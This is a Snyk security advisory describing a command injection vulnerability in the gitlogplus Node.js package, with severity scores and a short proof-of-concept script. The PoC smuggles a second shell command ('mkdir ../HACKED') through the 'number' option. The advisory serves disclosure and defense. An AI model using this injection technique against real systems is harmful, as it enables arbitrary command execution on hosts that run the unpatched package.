Command Injection Affecting gitlogplus package, versions *


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    30.82% (98th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-GITLOGPLUS-1315832
  • published 23 Jul 2021
  • disclosed 2 Jul 2021
  • credit Rafal Janicki

How to fix?

There is no fixed version for gitlogplus.

Overview

gitlogplus is a Git log parser for Node.JS

Affected versions of this package are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.

PoC by Rafal Janicki

# 1. Run `npm i gitlogplus`
# 2. Run `mkdir git && git init git` (creates empty git repository as subdirectory to working directory)
# 3. Commit a file in the repository so that git log has been created
# 4. Run the below JavaScript PoC, which will create a folder HACKED in the parent directory of the new git repository
"use strict"

const gitlog = require('gitlogplus'); const options = { repo: __dirname + '/git', number: '20; mkdir ../HACKED; git log ' };

let commits = gitlog(options); console.log(commits);

References

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
8.1 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    High
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

9.8 critical